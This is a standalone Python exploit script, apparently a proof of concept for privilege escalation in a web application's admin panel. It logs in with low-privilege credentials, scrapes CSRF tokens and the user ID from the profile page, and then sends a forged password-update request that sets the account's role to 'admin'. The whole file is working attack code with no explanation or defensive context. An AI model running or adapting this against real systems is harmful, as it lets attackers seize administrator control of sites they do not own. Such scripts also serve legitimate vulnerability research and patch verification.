#!/usr/bin/env python3
import requests
import re
import sys

requests.packages.urllib3.disable_warnings()

def main():
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <url> <username> <password>")
        sys.exit(1)

    target = sys.argv[1].rstrip('/')
    username = sys.argv[2]
    password = sys.argv[3]

    s = requests.Session()
    s.verify = False

    print(f"[*] Logging in as {username}...")
    r = s.get(f"{target}/admin/login")
    csrf = re.search(r'authenticity_token" value="([^"]+)"', r.text)
    if not csrf:
        print("[-] Failed to get CSRF token")
        sys.exit(1)

    r = s.post(f"{target}/admin/login", data={
        'authenticity_token': csrf.group(1),
        'user[username]': username,
        'user[password]': password
    }, allow_redirects=True)

    if 'dashboard' not in r.text.lower() and 'logout' not in r.text.lower():
        print("[-] Login failed")
        sys.exit(1)
    print("[+] Login successful!")

    r = s.get(f"{target}/admin/profile/edit")
    user_id = re.search(r'/admin/users/(\d+)/updated_ajax', r.text)
    csrf = re.search(r'form-ajax-password[^>]*>.*?authenticity_token" value="([^"]+)"', r.text, re.DOTALL)
    
    if not user_id or not csrf:
        print("[-] Could not find user ID or CSRF token")
        sys.exit(1)
    
    user_id = user_id.group(1)
    csrf = csrf.group(1)
    print(f"[*] User ID: {user_id}")

    print("[*] Sending exploit...")
    r = s.post(
        f"{target}/admin/users/{user_id}/updated_ajax",
        headers={
            'X-Requested-With': 'XMLHttpRequest',
            'X-CSRF-Token': csrf,
            'Accept': '*/*',
            'Origin': target,
            'Referer': f'{target}/admin/profile/edit'
        },
        data={
            '_method': 'patch',
            'authenticity_token': csrf,
            'password[password]': password,
            'password[password_confirmation]': password,
            'password[role]': 'admin'
        },
        allow_redirects=False
    )

    if r.status_code == 200:
        print("[+] Exploit successful! Logout and login again for admin privileges.")
    else:
        print(f"[-] Failed: {r.status_code}")

if __name__ == "__main__":
    main()
